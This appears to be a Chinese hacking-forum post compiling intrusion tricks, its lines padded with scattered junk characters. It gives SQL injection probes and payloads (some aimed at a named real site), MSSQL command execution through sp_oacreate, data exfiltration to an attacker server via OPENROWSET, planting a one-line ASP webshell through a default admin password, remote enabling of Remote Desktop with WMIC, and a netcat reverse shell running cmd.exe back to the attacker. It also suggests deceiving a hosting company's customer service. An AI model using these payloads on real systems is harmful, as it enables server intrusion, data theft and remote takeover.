SA点数据库分离技术相关9 K( Z% _! ~5 V
, g8 @7 u8 b+ z' g; C
; L& c% {) ]$ V1 w7 B' x
SA点数据库分离搞法+语句:
8 A/ Y" L! Z1 `! r( h* O6 }& ]8 D- t, F$ L, E9 ]% a1 w1 z
注射点不显错,执行下面三条语句页面都返回正常。
2 M3 i/ O# I) P4 g( qand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') b1 `6 B# j' q$ |
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'): |. V4 T9 L+ X, Q9 Y- y r1 H
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
$ \5 M4 n2 G# r; L& K$ d& C可以列目录,判断系统为2000,web与数据库分离
2 A2 t; L" b: i7 l6 k遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。7 t+ y- E( @( W
在注射点上执行
/ L$ ]+ W: S! {9 J& q; K$ cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--& n# B) D1 D3 J0 N: W
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
! k4 d- V4 V. I3 G还有我用NC监听得其他端口都没有得到IP。
3 I' x# q, {3 S2 H2 `- `' }* s/ N$ n9 r" @; c, j* U0 ? m
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。$ O' O" [! c6 v$ ~' R
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& g. I; F, z0 M9 B# Q
: @4 P5 S+ W8 v! }! k;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 H: x1 V* Z, `& V. u
8 U- s- V# n8 \0 d现在就猜想是不是数据库是内网而且不能连外网。
7 g5 ?* t$ I5 G8 [' a2 G$ g8 V# z$ i5 U% C' y2 I
I5 K; \) ~" {) r5 B
access导出txt文本代码# D6 D) n* I( Z: d# w
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
% g* f8 U) t2 E1 b- Z) N+ W0 k/ u5 L$ V$ r% R7 t
2 q7 E: t- W5 n+ o
* y3 |" m4 f. w6 ]3 s: j自动跳转到指定网站代码头
* d+ {: f p# X9 a* S<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>" p- `( _, ^+ e0 l
- r7 P J% N2 M' w+ U/ d1 F( ]* y4 j1 U M4 b' K* E7 F L0 `9 ]
入侵java or jsp站点时默认配置文件路径:3 G- v( A$ f0 K* A9 s k r
\web-inf\web.xml$ u+ b2 C( p+ k2 R
tomcat下的配置文件位置:0 Z3 _; \1 X$ P! O( m
\conf\server.xml (前面加上tomcat路径)
; r7 F+ N. x; c" g4 q- a\Tomcat 5.0\webapps\root\web-inf\struts-config.xml) @5 s: N6 x! V
- Z8 M8 h6 W9 K5 A& U
0 A1 Y6 p/ w3 ~ w; a. \7 k/ B+ m6 @0 _
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
. v& c+ Y" F+ \+ a-1%23
6 p- T; N' H/ s) ?) ^3 D>
% r$ j; r; S3 c$ R" \" T [& u& `<
$ I N( H" G$ b- G" \( R( y1'+or+'1'='1& W6 S( ^" p5 x, J
id=8%bf( V" ]4 I- K( Y( O& A
1 g V% ]1 v; i" O, u
全新注入点检测试法: q8 y, f( L' ?) y3 j
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
8 t6 N' A3 L) |4 @' J( w0 q
3 \& E# x6 h. X4 {. [" F在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
' W: v# J& S/ Y7 U1 R0 { f* P( V0 b3 q. o) L
搜索型注入判断方法:* [: Q. {) i, P8 y
北京%' and '1'='1' and '%'='& t( @- f& v- S) k6 F, r# f# j
北京%' and '1'='2' and '%'='
2 c2 Z' `% @* m7 k- J: V# \/ X4 W5 E5 G2 d
5 d( J( V! ?# V+ @& pCOOKIES注入:
& G! {; n0 i3 C8 v4 w/ h" N; d% [8 G
javascript:alert(document.cookie="id="+escape("51 and 1=1"));0 Y# P5 u3 }5 ~: k* r! q* e" H
4 b2 f$ P! T! w i( q: {+ G8 }2000专业版查看本地登录用户命令:
8 m. T; N# R1 F' W" g4 S2 Rnet config workstation1 W5 r# @( l9 `6 H, y
/ N q& w9 m" x# b4 r3 ~! P
9 e; K M- N5 e! [. v2003下查看ipsec配置和默认防火墙配置命令:+ r( b4 x. z8 Z
netsh firewall show config
( A+ I ]5 O; O8 c6 {/ jnetsh ipsec static show all8 Q1 y* I9 y! o" R# H
. Z" Y3 k/ ^- R P不指派指定策略命令:7 G0 Y! e3 A( t( W I
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
: p$ l/ [5 F( L# S! Pnetsh ipsec static show policy all 显示策略名9 {7 g d4 e( o3 E( A7 |" z9 {
3 P- L8 @% G" Y
7 a% {* S0 q; x4 s1 m! g( `6 h
猜管理员后台小技巧:
- [4 Q- O. J9 N( _- Iadmin/left.asp ( B$ a- j) t" E1 R% P6 N
admin/main.asp h- W$ o' d$ B, H+ Z7 |! I
admin/top.asp2 k: f1 T5 p' Q& f/ V& U! p$ s; f8 B
admin/admin.asp
1 g5 E* |! i0 }# ^; v9 L6 `2 V会现出菜单导航,然后迅雷下载全部链接
( k4 n( S$ V% @% }7 a' k- Q/ M) G {7 |: I# ]
7 T+ n6 @8 T2 P" `* ?4 M, N社会工程学:
" _8 C5 A! C, Q- l用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人. F6 L5 J8 f5 O2 q/ \
然后去骗客服2 @) j) N! p+ P. z% D
2 w/ b0 R1 a8 p3 a+ B9 ^7 @, y9 n* `8 k" p; @
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
6 i8 C! |, T; s1 e4 u" r查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 9 l4 Z2 \5 @5 [: Y% k6 E
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。3 s0 \# l5 X' I5 V6 W
$ P* j* ~2 [$ z
1 n( @3 Y7 ~8 Q5 y) L Y! s2 P/ W6 ^8 b! k8 c
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
' F* E$ z+ [7 |( ]$ V
+ l |( k; i- f* B' S& C( E1 n$ @1 t8 h% n" K s: t9 z
+ l- ?% c. j7 s {' G" R; JCMD加密注册表位置
7 M$ c6 `) }% Q. C0 w- c(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
' f: K" c0 Y, R* J8 ~3 yAutoRun# h% {5 Z6 ^5 e- {. S1 b
( a1 A/ y8 |# S4 `& `
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor% }; L$ i# ]' }9 \. N8 u
AutoRun& x3 _9 x/ T& P8 p, E% S
9 f$ b* A1 P P: W7 }/ ^
6 D, p. W- H3 z# `* T在找注入时搜索Hidden,把他改成test
5 |5 q( \5 F5 t3 t2 [1 X$ f* t
0 H- K* ^" F- e) ^: r3 l p, S
& U2 @/ m, u$ K2 G' f3 {" E+ N7 D, w
mstsc /v:IP /console
& O- V2 x- E5 \
! s1 C# j ~7 V0 [/ B7 @1 u
. ?! D* g& s+ \8 O! ?' h4 t( q) p% ?一句话开3389:
. Z2 l% G/ I2 C) }/ }4 n8 G
1 v P3 j& W4 H" L- c7 V最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 4 a- o2 t6 o2 e& S
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.! _ t) l6 M* n( m1 @7 |% [ g9 e) Y
" t; W ~8 e6 M8 ?( S U% M- z- E
1 {, ?7 U2 U1 U v5 W4 l+ E知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:! `+ G. @% z. b% d0 y
Insert into admin(user,pwd) values('test','test')
. t% n/ v' \9 W, G# V* U# z6 A5 F3 R9 {9 |, b5 }5 Q
v0 k: ]5 _+ ^9 L2 n" Q+ s
NC反弹8 l) \9 S; \: W. e
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
! D. _ [7 E8 b9 r* h" K) V1 }然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
/ _& A; p5 q- {2 I3 T: _. L, g" k4 Y0 M& J& f. h
7 b# I4 ?" s" M7 j
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
4 C% W3 h* [" C$ S! e+ O# ?5 x/ J& i. d/ Q
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
* u% R2 q0 X; e6 \- m) k& C! D例如:- r- Z6 w' T2 E- H, F
subst k: d:\www\ 用d盘www目录替代k盘6 ~: V2 g9 V, l1 W) I
subst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对